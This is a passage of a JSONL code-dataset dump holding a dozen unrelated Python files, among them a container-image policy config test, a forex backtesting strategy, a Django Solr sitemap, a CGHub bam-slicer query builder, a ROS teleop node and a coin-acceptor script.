\"dockerhub\",\n },\n ],\n}\nmatch_image_tag = \"docker.io/securesystemsengineering/sample:v1\"\nmatch_image_digest = (\n \"docker.io/securesystemsengineering/sample@sha256:\"\n \"1388abc7a12532836c3a81bdb0087409b15208f5aeba7a87aedcfd56d637c145\"\n)\n\n\n@pytest.mark.parametrize(\n \"config_path, exception\",\n [\n (\"sample_config\", fix.no_exc()),\n (\"err\", pytest.raises(FileNotFoundError)),\n (\"err1\", pytest.raises(exc.NotFoundException)),\n (\n \"err2\",\n pytest.raises(\n exc.InvalidConfigurationFormatError, match=r\".*invalid format.*\"\n ),\n ),\n (\n \"err3\",\n pytest.raises(exc.InvalidConfigurationFormatError, match=r\".*validator.*\"),\n ),\n (\n \"err4\",\n pytest.raises(exc.InvalidConfigurationFormatError, match=r\".*roots.*\"),\n ),\n (\n \"err5\",\n pytest.raises(\n exc.InvalidConfigurationFormatError, match=r\".*invalid format.*\"\n ),\n ),\n ],\n)\ndef test_config(config_path, exception):\n co.Config._Config__PATH = f\"tests/data/config/{config_path}.yaml\"\n with exception:\n config = co.Config()\n assert len(config.validators) == len(static_config[\"validators\"])\n assert len(config.policy) == len(static_config[\"policy\"])\n for index, validator in enumerate(config.validators):\n assert validator.name == static_config[\"validators\"][index][\"name\"]\n assert isinstance(validator, static_config[\"validators\"][index][\"type\"])\n for index, rule in enumerate(config.policy):\n assert rule[\"pattern\"] == static_config[\"policy\"][index][\"pattern\"]\n\n\n@pytest.mark.parametrize(\n \"key_name, name, exception\",\n [\n (\"default\", \"default\", fix.no_exc()),\n (\"harbor\", \"harbor\", fix.no_exc()),\n (None, \"default\", fix.no_exc()),\n (\"harborr\", \"\", pytest.raises(exc.NotFoundException)),\n ],\n)\ndef test_get_notary(key_name, name, exception):\n config = co.Config()\n with exception:\n assert config.get_validator(key_name).name == name\n\n\n@pytest.mark.parametrize(\n \"rule, image, comp_count, comp_len, pre_len\",\n [\n (\"\", \"\", 1, [2], [0]),\n (\"*:*\", match_image_tag, 1, [3], [0]),\n (\"doc*/*\", match_image_tag, 2, [4, 3], [3, 0]),\n (\"*/sec*/*:*\", match_image_tag, 3, [1, 4, 3], [0, 3, 0]),\n (\"*@sha256:*\", match_image_digest, 1, [10], [0]),\n ],\n)\ndef test_match(rule: str, image: str, comp_count: int, comp_len: list, pre_len: list):\n match = co.Match(rule, image)\n rule_with_tag = rule if \":\" in rule else f\"{rule}:*\"\n assert match.key == rule\n assert match.pattern == rule_with_tag\n assert match.component_count == comp_count\n assert match.component_lengths == comp_len\n assert match.prefix_lengths == pre_len\n\n\n@pytest.mark.parametrize(\"rule, exist\", [(\"\", False), (\"*\", True)])\ndef test_match_bool(rule: str, exist: bool):\n match = co.Match(rule, \"image\")\n assert bool(match) == exist\n\n\n@pytest.mark.parametrize(\n \"rule1, rule2, image\",\n [\n (\"\", \"*\", match_image_tag),\n (\"*\", \"*:*\", match_image_tag),\n (\"*:*\", \"*/*\", match_image_tag),\n (\"*/*\", \"docker*/*\", match_image_tag),\n (\"docker*/*\", \"*/*/*\", match_image_tag),\n (\"*/*/image:v1\", \"*/sam*/*\", match_image_tag),\n ],\n)\ndef test_match_compare(rule1: str, rule2: str, image: str):\n m1 = co.Match(rule1, image)\n m2 = co.Match(rule2, image)\n fighters = [m1, m2]\n assert m1.compare(m2) == fighters[1]\n\n\n@pytest.mark.parametrize(\n \"image, rule\",\n [\n (\"image:tag\", \"docker.io/*:*\"),\n (\"reg.io/image:tag\", \"*:*\"),\n (\"k8s.gcr.io/path/image\", \"k8s.gcr.io/*:*\"),\n (\n \"docker.io/securesystemsengineering/sample:v4\",\n 
\"docker.io/securesystemsengineering/sample:v4\",\n ),\n ],\n)\ndef test_get_policy_rule(image: str, rule):\n c = co.Config()\n assert str(c.get_policy_rule(Image(image))) == rule\n\n\ndef test_get_matching_rule_error():\n with pytest.raises(exc.NoMatchingPolicyRuleError):\n c = co.Config()\n c.policy = c.policy[1:]\n assert c.get_policy_rule(Image(\"reg.io/image\"))\n","sub_path":"tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":6752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"206689504","text":"# Tuples -- Sequence of elments separed with comma which are declared inside ( )...\n\n# a=(1,2,3,4)\n\n# print(type(a))\n\n# a=1,2,3,4\n\n# print(type(a))\n\n# a=(1)\n# print(type(a))\n\n# a=1\n# print(type(a))\n\n# a=(1,) # single value tuple\n\n# Tuples are immutable.. (we cannot make changes).\n\na=(1,11,54,'datascience','devops','cricket',[23,24,25])\n\n\n# accessing elments inside the tuple..(indexing)\n\n\n# print(a[4])\n\n# print(a[1:6])\n\n# print(a[0:7:2]) # slicing\n\n# print(a[-2])\n\n# a[1]=23\n\n# del a[1]\n\n# Basic Operations:-\n\n\t# concatenation(+):- Adding 2 or more tuples..\n\t# repetition(*):- Repeating same tuple elements multiple times..\n\n\n# print((1,2,3)+(4,5,6))\n\n# print((3,4,5)*3)\n\n\na=(3,4,59,1,2,0,7,3,6,1,6,2,3,7)\n\n# print(a.count(3))\n# print(a.index(7))\n\n# print(len(a))\n\nrange(0,21)\nb=()\nc=()\n\nprint(b) #(0,2,4,6,8,10,12,14,16,18,20)\nprint(c) #(1,3,5,7,9,11,13,15,17,19)\n\n","sub_path":"tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"395688895","text":"import string \nimport random\ndef urlshort(s):\n x = \"cp.li\"\n z = \".w\"\n res = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))\n x = x+res+z\n return(x)\nurl = {}\nn = int(input(\"Total Number of URLs you want to short : \"))\nwhile(n):\n s = input(\"Enter your Url : \")\n try:\n x = url[s]\n except:\n x = urlshort(s)\n url[s] = x\n print(x)\n n-=1\n ","sub_path":"URLshortner.py/divyanshsikarwar.py","file_name":"divyanshsikarwar.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"476753677","text":"import argparse\n\nfrom util import *\nfrom technical_indicators import *\n\n\n# parse start_date and end_date from input\n\nparser = argparse.ArgumentParser(\n description='Forex trading naive strategy implementation')\nparser.add_argument('--start_date', nargs='?', help='backtesting start date', default='2017-01-01')\nparser.add_argument('--end_date', nargs='?', help='backtesting end date', default='2017-04-01')\n\nargs = parser.parse_args()\n\nstart_date = args.start_date # backtesting start date\nend_date = args.end_date # backtesting end date\n\n# set some constants\n\ninstrument = \"EURUSD\" # currency pair\ngranularity = '1D' # data granularity\n\n# economical constants\n\nbudget = 100000 # total budget\npip = 0.00001 # pip value\ntrade = 1*pip # each trade value\ntakeProfit = 500*pip # take profit value\nstopLoss = 250*pip # stop loss value\nparams = [budget, pip, trade,\n takeProfit, stopLoss] # array with all economical constants\n\n# download and load data\n\ndata, _ = get_tick_data(instrument, start_date, end_date, granularity)\nif not _:\n get_tick_to_granularity(instrument, start_date, end_date, granularity)\n data, _ = 
get_tick_data(instrument, start_date, end_date, granularity)\n\n# add new columns to data dataframe with bid and ask averages\n\n# calculate averages #\n\nlow = (data['lowAsk']+data['lowBid'])/2\nhigh = (data['highAsk']+data['highBid'])/2\nclose = (data['closeAsk']+data['closeBid'])/2\nopen = (data['openAsk']+data['openBid'])/2\n\n# add new columns to dataframe #\n\ndata['low'] = low\ndata['high'] = high\ndata['close'] = close\ndata['open'] = open\n\n# indicators\n\nsmma_low = moving_average(data, 4, 'low') # moving averages\nsmma_high = moving_average(data, 10, 'high') #\n\natr = average_true_range(data, 5, 'high', 'low', 'close') # average true range\n\nmacd = macd(data, 5, 31, 'close')[0] # moving average convergence divergence\n\nUpper, Lower = bollinger_bands(data, 16, 'close') # bollinger bands\n\nk = stochastic_oscillator_k(data, 'high', 'low', 'close') # stochastic oscillators\nd = stochastic_oscillator_d(data, 3, 'high', 'low', 'close')\n\n# buying and selling conditions\n\n# long conditions #\n\nenter_long = ((crossover(k, d)) & (Upper >= Upper.shift(1))\n & (Lower >= Lower.shift(1)) & (atr > (atr.shift(1) + 0.0001)))\n\nsell_long = crossunder(close, smma_low)\n\n# short conditions #\n\nenter_short = ((crossover(d, k)) & (Upper <= Upper.shift(1))\n & (Lower <= Lower.shift(1)) & (atr > (atr.shift(1) + 0.0001)))\n\nsell_short = crossunder(close, smma_high)\n\n# calculates trades and profit\n\nlong_trades, short_trades = get_trades([enter_long, sell_long, enter_short, sell_short], data, params)\n\ntrades_profit = get_trades_profit([long_trades, short_trades], data)\n\n# print all trades\n\nfor trade in trades_profit:\n print(trade)\n","sub_path":"scripts/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"557969054","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[2]:\n\n\n#-------------------------------------------------------------------------------------------------------------------------------\n# By Alexandra Lee (July 2018) \n#\n# Apply PCA or ICA to compress Pseudomonas gene expression data (from ArrayExpress) and \n# visualize expression data projected onto first two reduced dimensions\n# \n# Input: Pa gene expression data from ArrayExpress (matrix: sample x gene)\n# Data compression method: PCA or ICA\n# Output: Reduced Pa gene expression data (matrix: sample x 2 linear combination of genes)\n#-------------------------------------------------------------------------------------------------------------------------------\nimport os\nfrom sklearn.decomposition import PCA, FastICA\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nnp.random.seed(123)\n\n\n# In[3]:\n\n\n# load arguments\ndata_file = os.path.join(os.path.dirname(os.getcwd()), \"data\", \"all-pseudomonas-gene-normalized.pcl\")\nmap_file = os.path.join(os.path.dirname(os.getcwd()), \"metadata\", \"mapping_sampleID_medium.txt\")\ncomponent_num = 2\n\n# specify either 'ica' or 'pca'\nmethod = 'pca' \n\n\n# In[4]:\n\n\n# read in data\ndata = pd.read_table(data_file, header=0, sep='\\t', index_col=0)\nX = data.transpose()\nX.head(5)\n#X.shape\n\n\n# In[ ]:\n\n\n# PCA\nif method == 'pca':\n reduced = PCA(n_components=component_num)\n reduced_X = reduced.fit_transform(X)\n# ICA\nelse:\n reduced = FastICA(n_components=component_num)\n reduced_X = reduced.fit_transform(X)\n\n\n# In[ 
]:\n\n\n# Map sample id to clinical phenotype (i.e. experimental condition)\n\n# Note:\n# According to the source (https://github.com/scikit-learn/scikit-learn/blob/14031f6/sklearn/decomposition/pca.py#L310),\n# input will be transformed by np.array() before doing PCA. So row index will be lost during \n# PCA.fit_transform(X) even using a structured array or a pandas DataFrame. However, the order of the data is preserved, \n# meaning you can attach the index back afterward\n\nX_ann = pd.DataFrame(reduced_X, index=X.index, columns=['1', '2'])\n\n# read in mapping file (sample id --> phenotype)\nmapper = pd.read_table(map_file, header=0, sep='\\t', index_col=0)\n\n# Join \nX_new = pd.merge(X_ann, mapper, left_index=True, right_index=True)\nX_new.head(10)\n#X_new.shape\n\n\n# In[ ]:\n\n\n# Plot\nfg = sns.lmplot(x='1', y='2', data=X_new, hue='medium', fit_reg=False)\nfg.add_legend()\nfig_file = os.path.join(os.path.dirname(os.getcwd()), \"viz\",\"{}.png\".format(method))\nfg.fig.suptitle(method.upper()+' compressed data')\nfg.savefig(fig_file)\n\n\n# In[ ]:\n\n\n# Output compressed data\nfile_out = os.path.join(os.path.dirname(os.getcwd()), \"encoded\",\"{}_encoded.txt\".format(method))\nX_new.to_csv(file_out, sep='\\t')\n\n","sub_path":"exploration/scripts/nbconverted/PCA_ICA_model.py","file_name":"PCA_ICA_model.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"603664562","text":"import math\nfrom django.contrib.sites.models import Site, get_current_site\nfrom django.contrib.sitemaps import Sitemap\nfrom django.contrib.sitemaps import GenericSitemap\nfrom django.views.decorators.cache import cache_page\n\nfrom urllib2 import *\nimport simplejson\nimport json\nimport urllib\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nimport datetime\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import activate\nfrom string import Template\n\n\n# custom sitemap class\n\n\n\nclass RunAppMap(GenericSitemap):\n \"\"\"\n Skeleton class to generate sitemaps based on data from a Solr index.\n\n This sitemap is \"lazy\" compared to Django's built-in Sitemap, in that\n it does not fetch the data needed to compute all the URLs at once.\n Instead of using Django's built-in pagination, we delegate pagination\n operations to Solr itself using its `start` and `rows` parameters.\n \n \"\"\"\n #limit = 5000 #http://stackoverflow.com/questions/2079786/caching-sitemaps-in-django\n def __init__(self, groupBy, fieldList, view, freq, prio, page=1, *args, **kwargs):\n self.groupBy = groupBy\n self.fieldList = fieldList\n self.view = view\n self.freq = freq\n self.prio = prio\n self.pagenum = page\n self.results = self.pager (self.groupBy, self.fieldList, self.view)\n #print 'init'\n\n \n\n\n def lastmod(self, obj):\n return datetime.datetime.utcnow()\n\n def get_urls(self, site=None, page=None, protocol=None):\n if site is None:\n if Site._meta.installed:\n try:\n site = Site.objects.get_current()\n except Site.DoesNotExist:\n pass\n if site is None:\n raise ImproperlyConfigured(\"\"\"In order to use Sitemaps you must\\\n either use the sites framework or\\\n pass in a Site or RequestSite\\\n object in your view code.\"\"\")\n ##import pdb; pdb.set_trace()\n urls = []\n self.pagenum = page\n # This is where the `get_urls` deviates from the built-in `Sitemap`\n # class; there, the paginator is called on the next line. 
Instead,\n # the `items` method only gets enough results to populate a single page.\n\n for item in self.items():\n if self.location(item):\n loc = \"http://%s%s\" % (site.domain, self.location(item))\n priority = self.priority(item)\n url_info = {\n 'location': loc,\n 'lastmod': self.lastmod(item),\n 'changefreq': self.changefreq(item),\n 'priority': str(priority is not None and priority or '')\n }\n \n urls.append(url_info)\n return urls\n \n def items(self):\n\n end = int(self.pagenum) * self.limit\n start = end - self.limit\n return self.results[start:end]\n\n def location(self, obj):\n \"\"\"\n Inputs:\n `obj`: A single object from the collection of objects returned by\n the `items` method.\n\n Returns:\n An absolute path to the object. This is the path component of the\n URI that will be displayed in the sitemap.\n \n \"\"\"\n ##import pdb; pdb.set_trace()\n try:\n activate(obj['lang'])\n return reverse(obj['view'], kwargs=obj['params'])\n except:\n \treturn None\n\n def priority(self, obj):\n \"\"\"\n Inputs:\n `obj`: A single object from the collection of objects returned by\n the `items` method.\n\n Returns:\n An absolute path to the object. This is the path component of the\n URI that will be displayed in the sitemap.\n \n \"\"\"\n return self.prio\n\n def changefreq(self, obj):\n \"\"\"\n Inputs:\n `obj`: A single object from the collection of objects returned by\n the `items` method.\n\n Returns:\n An absolute path to the object. This is the path component of the\n URI that will be displayed in the sitemap.\n \n \"\"\"\n return self.freq\n\n\n def pager (self, groupBy, fieldList, view):\n items, pages = self.requester (groupBy, 0, fieldList, view)\n #print 'pager'\n if pages > 0:\n for page in range(1,pages):\n pageitems, nopages = self.requester (groupBy, page, fieldList, view)\n items.extend (pageitems)\n \n return items\n\n def requester (self, groupBy, page, fieldList, view):\n pageSize = 1000\n #print 'requester', page, groupBy\n start = page * pageSize\n url = Template ('$solr/select?&q=*:*&group=true&group.field=$groupBy&wt=json&rows=$rows&group.limit=1&sort=raceYear%20desc&start=$start&fl=$fieldList')\n if not groupBy: groupBy='countryId'\n if not fieldList: fieldList=['nofieldsplease']\n url = url.substitute (solr=settings.RUNMODO_SOLR_URL, groupBy=groupBy, rows=str(pageSize), start=str(start), fieldList=str(','.join(fieldList)))\n\n #conn = urlopen(settings.RUNMODO_SOLR_URL + '/select?&q=*:*&group=true&group.field='+ groupBy +'&wt=json&rows='+ str(pageSize) +'&group.limit=1&sort=raceYear%20desc&start='+ str(start) +'&fl='+ ','.join(fieldList))\n conn = urlopen(url)\n response = simplejson.load(conn)\n count = response['grouped'][groupBy]['ngroups']\n pages = int(math.ceil(count / pageSize))\n items = []\n for lang in ['en','fr']:\n for doc in response['grouped'][groupBy]['groups']:\n params = doc['doclist']['docs'][0]\n item = {\n 'value': doc['groupValue'],\n 'view': view,\n 'params': params,\n 'lang': lang\n }\n items.append(item)\n\n return items, pages","sub_path":"runapp/sitemaps.py","file_name":"sitemaps.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"378713470","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 2019/3/25 13:11\n# @File : setup.py.py\n\nimport os\nimport re\nimport sys\nimport setuptools\n\n\ndef get_reqs_from_files(requirements_files):\n for requirements_file in requirements_files:\n if os.path.exists(requirements_file):\n return 
open(requirements_file, 'r').read().split('\\n')\n return []\n\n\ndef parse_requirements(requirements_files=['requirements.txt']):\n requirements = []\n for line in get_reqs_from_files(requirements_files):\n # For the requirements list, we need to inject only the portion\n # after egg= so that distutils knows the package it's looking for\n # such as:\n # -e git://github.com/openstack/nova/master#egg=nova\n if re.match(r'\\s*-e\\s+', line):\n requirements.append(re.sub(r'\\s*-e\\s+.*#egg=(.*)$', r'\\1',\n line))\n # such as:\n # http://github.com/openstack/nova/zipball/master#egg=nova\n elif re.match(r'\\s*https?:', line):\n requirements.append(re.sub(r'\\s*https?:.*#egg=(.*)$', r'\\1',\n line))\n # -f lines are for index locations, and don't get used here\n elif re.match(r'\\s*-f\\s+', line):\n pass\n # argparse is part of the standard library starting with 2.7\n # adding it to the requirements list screws distro installs\n elif line == 'argparse' and sys.version_info >= (2, 7):\n pass\n else:\n requirements.append(line)\n\n return requirements\n\n\ndef parse_dependency_links(requirements_files=['requirements.txt']):\n dependency_links = []\n # dependency_links inject alternate locations to find packages listed\n # in requirements\n for line in get_reqs_from_files(requirements_files):\n # skip comments and blank lines\n if re.match(r'(\\s*#)|(\\s*$)', line):\n continue\n # lines with -e or -f need the whole line, minus the flag\n if re.match(r'\\s*-[ef]\\s+', line):\n dependency_links.append(re.sub(r'\\s*-[ef]\\s+', '', line))\n # lines that are only urls can go in unmolested\n elif re.match(r'\\s*https?:', line):\n dependency_links.append(line)\n return dependency_links\n\n\nsetuptools.setup(\n name='karl_pkg',\n version='1.0.0',\n description='karl python package sample',\n author='karl',\n author_email='karl@karl.com',\n\n packages=setuptools.find_packages(exclude=['bin']),\n py_modules=[],\n include_package_data=True,\n install_requires=[\n 'numpy==1.13.3',\n 'pandas==0.20.3',\n ],\n dependency_links=[],\n\n entry_points={\n 'console_scripts': [\n 'karl-print = karl_pkg.cmd.print_cmd:main',\n ]\n },\n)\n","sub_path":"pypi_install_script/karl_pkg-1.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"80205993","text":"import rclpy\nfrom rclpy.node import Node\nimport math\n\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import Float32\nfrom sensor_msgs.msg import Joy\n\nclass TeleopNode(Node):\n\n def __init__(self):\n super().__init__('teleop_publisher')\n self.mob_publisher_ = self.create_publisher(Twist, 'cmd_vel', 10)\n self.drum_publisher_ = self.create_publisher(Float32, 'drum_vel', 10)\n self.arm_publisher_ = self.create_publisher(Float32, 'arm_vel', 10)\n\n self.subscriber_ = self.create_subscription(Joy, 'joy', self.joy_callback,10)\n self.subscriber_\n\n # keep the last msg to only change the velocity if the joy message changes\n self.last_joy_input = Joy()\n\n def joy_callback(self, msg):\n #first check if the joy con input has changes and if not return imediately\n if (msg.axes == self.last_joy_input.axes) & (msg.buttons == self.last_joy_input.buttons):\n return\n\n # joy input changes, convert the joy inputs into movment commands\n\n # first for the mobility base axes[0] is the vertical component of the left stick and axes[1] is the horizontal component of the left stick\n velocity = Twist()\n\n speed = math.sqrt((msg.axes[0])**2 + 
(msg.axes[1])**2)\n if speed > 1:\n speed = float(1)\n velocity.linear.x = speed\n\n angle = math.atan2(msg.axes[0], msg.axes[1])\n velocity.angular.z = angle\n \n #publish the velocity\n self.mob_publisher_.publish(velocity)\n \n #publish the drum velocity\n drum_vel = Float32()\n drum_vel.data = float(msg.axes[4])\n self.drum_publisher_.publish(drum_vel)\n\n #publish the arm velocity\n arm_vel = Float32()\n arm_vel.data = float(msg.buttons[1]) - float(msg.buttons[0])\n self.arm_publisher_.publish(arm_vel)\n\n\n\n\n # Save the msg for comparison later\n self.last_joy_input = msg\n \n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n teleop_node = TeleopNode()\n\n rclpy.spin(teleop_node)\n\n teleop_node.destroy_node()\n rclpy.shutdown()\n","sub_path":"build/teleop_node/build/lib/teleop_node/teleop.py","file_name":"teleop.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"336274641","text":"import time\nimport threading\nimport RPi.GPIO as GPIO\n\n\ndef current_milli_time(): return int(round(time.time() * 1000))\n\n\nEND_COIN_DELTA = 1500\n\nPULSE_PIN = 3\nCOUNTER_PIN = 2\n\n\nclass MuntstukAcceptor():\n def __init__(self):\n self.GPIO_setup()\n self.pulse_counter = 0\n self.last_pulse_time = 0\n self.has_pulsed = False\n self.start()\n\n def GPIO_setup(self):\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(PULSE_PIN, GPIO.IN)\n GPIO.setup(COUNTER_PIN, GPIO.IN)\n\n def incr_pulse(self, pin):\n self.pulse_counter += 1\n print(\"Number of pulses: \" + str(self.pulse_counter))\n self.last_pulse_time = current_milli_time()\n self.has_pulsed = True\n\n def check_end_pulse(self, pin):\n if current_milli_time() > self.last_pulse_time + END_COIN_DELTA and self.has_pulsed:\n if self.pulse_counter <= 5:\n print(\"0.50 euro\")\n elif self.pulse_counter <= 10:\n print(\"1 euro\")\n elif self.pulse_counter <= 20:\n print(\"2 euro\")\n else:\n print(\"wrong coin\")\n self.pulse_counter = 0\n self.has_pulsed = False\n\n def start(self):\n #GPIO.add_event_detect(PULSE_PIN, GPIO.FALLING, callback=self.incr_pulse, bouncetime=1)\n while True:\n # if current_milli_time() > self.last_pulse_time + END_COIN_DELTA and self.has_pulsed:\n # if self.pulse_counter <= 5:\n # print(\"0.50 euro\")\n # elif self.pulse_counter <= 10:\n # print(\"1 euro\")\n # elif self.pulse_counter <= 20:\n # print(\"2 euro\")\n # else:\n # print(\"wrong coin\")\n # self.pulse_counter = 0\n # self.has_pulsed = False\n GPIO.wait_for_edge(PULSE_PIN, GPIO.FALLING, bouncetime=1)\n print(\"fell\")\n self.incr_pulse(PULSE_PIN)\n GPIO.wait_for_edge(PULSE_PIN, GPIO.RISING, bouncetime=1)\n print(\"rose\")\n #\n # vorige_status = 0\n # while True:\n # status = GPIO.input(PULSE_PIN)\n # print(status)\n # if self.has_pulsed:\n # if current_milli_time() > self.last_pulse_time + END_COIN_DELTA:\n # if self.pulse_counter <= 5:\n # print(\"0.50 euro\")\n # elif self.pulse_counter <= 10:\n # print(\"1 euro\")\n # elif self.pulse_counter <= 20:\n # print(\"2 euro\")\n # else:\n # print(\"wrong coin\")\n # self.pulse_counter = 0\n # self.has_pulsed = False\n # if vorige_status == 1 and status == 0:\n # self.pulse_counter += 1\n # print(\"Number of pulses: \" + str(self.pulse_counter))\n # self.last_pulse_time = current_milli_time()\n # self.has_pulsed = True\n # vorige_status = 0\n # elif vorige_status == 0 and status == 1:\n # vorige_status == 
1\n\n\nGPIO.cleanup()\n\n","sub_path":"Code/Backend/helpers/munstuktest.py","file_name":"munstuktest.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"352057191","text":"#!/usr/bin/env python\n# coding: utf-8\n# Copyright (c) Qotto, 2019\n\nfrom datetime import datetime, timezone\n\nfrom typing import Dict, Any\n\nfrom tonga.models.records.event import BaseEvent\n\n__all__ = [\n 'CoffeeFinished'\n]\n\n\nclass CoffeeFinished(BaseEvent):\n uuid: str\n coffee_for: str\n coffee_time: int\n\n def __init__(self, uuid: str, coffee_time: int, coffee_for: str, **kwargs) -> None:\n super().__init__(**kwargs)\n self.uuid = uuid\n self.coffee_time = coffee_time\n self.coffee_for = coffee_for\n\n def to_dict(self) -> Dict[str, Any]:\n r_dict = self.base_dict()\n r_dict['uuid'] = self.uuid\n r_dict['coffee_for'] = self.coffee_for\n r_dict['coffee_time'] = self.coffee_time\n return r_dict\n\n @classmethod\n def from_dict(cls, dict_data: Dict[str, Any]):\n return cls(schema_version=dict_data['schema_version'],\n record_id=dict_data['record_id'],\n partition_key=dict_data['partition_key'],\n date=datetime.fromtimestamp(dict_data['timestamp'] / 1000, timezone.utc),\n correlation_id=dict_data['correlation_id'],\n context=dict_data['context'],\n uuid=dict_data['uuid'],\n coffee_for=dict_data['coffee_for'],\n coffee_time=dict_data['coffee_time'])\n\n @classmethod\n def event_name(cls) -> str:\n return 'tonga.bartender.event.CoffeeFinished'\n","sub_path":"examples/coffee_bar/waiter/models/events/coffee_finished.py","file_name":"coffee_finished.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"174710571","text":"#!/usr/bin/env python2.7\n\"\"\"\nCGquery handler\n\ngiven arguments, creates a pickled dictionary mapping TCGA analysis IDs to full cghub bam slicer\nquery strings. These strings are used in a cghub bam slicer query to extract regions from the bam\nthey represent.\n\"\"\"\n\nimport argparse\nimport urllib2\nimport itertools\nimport xml.etree.cElementTree as ET\nimport cPickle as pickle\n\n# this hard-coded list stores which assemblies use '1' instead of 'chr1'\n# because people suck\nnon_chr_names = ['GRCh37-lite', 'GRCh37']\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--genomes\", \"-g\", nargs=\"+\", required=True,\n help=\"Genomes to send to cgquery.\")\n parser.add_argument(\"--tissue_types\", \"-u\", nargs=\"+\", required=True,\n help=\"Tissue types to look at.\")\n parser.add_argument(\"--size\", nargs=2, default=[\"120000000000\",\"*\"],\n help=\"two integer values representing # of bytes we want to look at. Second value can be *\")\n parser.add_argument(\"--study\", default=\"phs000178\",\n help=\"Study to look at. default=phs000178.\")\n parser.add_argument(\"--library_strategy\", default=\"WGS\",\n help=\"library type. default=WGS\")\n parser.add_argument(\"--target_range\", \"-t\", nargs=\"+\", default=[\"chr1:120392936-120744537\",\n \"chr1:145117638-145295356\",\n \"chr11:93677347-93678520\"],\n help=\"target range(s) of assembly. include the word chr.\")\n parser.add_argument(\"--out\", \"-o\", default=\"data/queries.pickle\", type=argparse.FileType(\"wb\"),\n help=\"Location to write out the pickled queries to. 
Default = queries/queries.pickle\")\n parser.add_argument(\"--debug_cutoff\", type=int)\n return parser.parse_args()\n\n\ndef search_metadata(genomes, tissue_types, size, study, library_strategy):\n \"\"\"\n given arguments to program, query cghub for all xmls.\n returns a list of xmls representing each combination of queries.\n \"\"\"\n size = '[' + \"%20TO%20\".join(size) + ']'\n xml_list = []\n base_path = \"https://cghub.ucsc.edu/cghub/metadata/analysisDetail?\"\n for genome, tissue in itertools.product(genomes, tissue_types):\n search = [\"=\".join([x, y]) for x, y in zip([\"study\", \"sample_type\", \"library_strategy\",\n \"refassem_short_name\", \"filesize\"], [study, tissue, library_strategy, genome, size])]\n url = base_path + \"&\".join(search)\n xml_list.append(ET.parse(urllib2.urlopen(url)).getroot())\n # return a flat list of xml elements\n return [item for sublist in xml_list for item in sublist]\n\n\ndef parse_metadata_xml(xml_list):\n \"\"\"\n Parses a metadata xml retrieved from cgquery.\n \"\"\"\n analysis_dict = {}\n for item in xml_list:\n if item.find('analysis_id') is not None and item.find('state').text != 'suppressed':\n analysis = item.find('analysis_id').text\n refassem_short_name = item.find('refassem_short_name').text\n analysis_dict[analysis] = refassem_short_name\n return analysis_dict\n\n\ndef build_bamslicer_query(analysis, refassem_short_name, ranges):\n \"\"\"\n Builds a query string for the CGhub bam slicer.\n \"\"\"\n if refassem_short_name in non_chr_names:\n ranges = [x.replace(\"chr\",\"\") for x in ranges]\n formatted_ranges = \"\".join([\"&range=\", \"&range=\".join(ranges)])\n base_path = \"https://slicer.cghub.ucsc.edu/analyses/{}/slices?ref={}&format=bam\".format(analysis,\n refassem_short_name)\n query_string = \"\".join([base_path, formatted_ranges])\n return query_string\n\n\ndef main():\n args = parse_args()\n xml_list = search_metadata(args.genomes, args.tissue_types, args.size, args.study, args.library_strategy)\n analysis_dict = parse_metadata_xml(xml_list)\n\n query_dict = {}\n for analysis, refassem_short_name in analysis_dict.iteritems():\n query_string = build_bamslicer_query(analysis, refassem_short_name, args.target_range)\n query_dict[analysis] = query_string\n\n if args.debug_cutoff is None:\n pickle.dump(query_dict, args.out)\n print (\"Dumped {} records for analysis.\".format(len(query_dict)))\n else:\n t = dict(query_dict.items()[:args.debug_cutoff])\n pickle.dump(t, args.out)\n print (\"Dumped {} records for analysis.\".format(len(t)))\n\n\nif __name__ == '__main__':\n main()","sub_path":"src/cgqueryHandler.py","file_name":"cgqueryHandler.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"131747954","text":"'''\n107. Binary Tree Level Order Traversal II\nEasy\n\nGiven a binary tree, return the bottom-up level order traversal of its nodes' values. 
